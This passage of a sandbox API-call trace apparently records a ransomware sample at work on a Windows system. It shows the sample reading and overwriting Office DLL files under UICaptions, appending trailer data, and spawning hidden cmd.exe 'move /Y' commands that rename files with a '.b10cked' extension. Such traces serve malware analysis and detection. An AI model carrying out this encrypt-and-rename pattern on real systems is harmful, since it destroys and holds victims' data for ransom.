SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xa6078 [0156.407] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xa6560 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xa6560 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0156.451] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.534] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.594] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0156.596] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0156.596] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.597] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.597] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0156.597] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0156.597] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.717] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.718] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0156.720] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0156.720] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.720] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.721] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0156.721] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x86560 [0156.721] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.744] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.745] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0156.746] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x86560 [0156.746] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.746] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.747] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0156.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0156.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLLIBR.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0156.750] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xa6560 [0156.750] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0156.750] CloseHandle (hObject=0x114) returned 1 [0156.941] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX") returned 0x3c [0156.942] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0156.943] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xd3c, dwThreadId=0xe44)) returned 1 [0156.945] CloseHandle (hObject=0x1b4) returned 1 [0156.945] CloseHandle (hObject=0x114) returned 1 [0156.945] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0156.945] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0156.945] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0156.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.945] ReleaseMutex (hMutex=0xf8) returned 1 [0156.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.945] ReleaseMutex (hMutex=0xf8) returned 1 [0156.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.945] ReleaseMutex (hMutex=0xf8) returned 1 [0156.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.945] ReleaseMutex (hMutex=0xf8) returned 1 [0156.945] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.946] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21373515604) returned 1 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x2b60 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2678 [0156.948] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0156.984] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0156.984] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0156.984] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2b60 [0156.984] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0156.984] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0156.984] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0156.985] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2b60 [0156.985] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0156.985] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0156.985] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x15af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x15af, lpOverlapped=0x0) returned 1 [0156.988] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0156.988] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x15af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x15af, lpOverlapped=0x0) returned 1 [0156.988] SetFilePointer (in: hFile=0x114, lDistanceToMove=-5551, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x15b1 [0156.988] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x15af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x15af, lpOverlapped=0x0) returned 1 [0156.988] SetFilePointer (in: hFile=0x114, lDistanceToMove=-5551, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x15b1 [0156.988] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x15af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x15af, lpOverlapped=0x0) returned 1 [0156.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLWVW.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0156.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLWVW.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLWVW.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0156.993] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2b60 [0156.993] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0156.994] CloseHandle (hObject=0x114) returned 1 [0156.994] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX") returned 0x3c [0156.995] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0156.996] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, 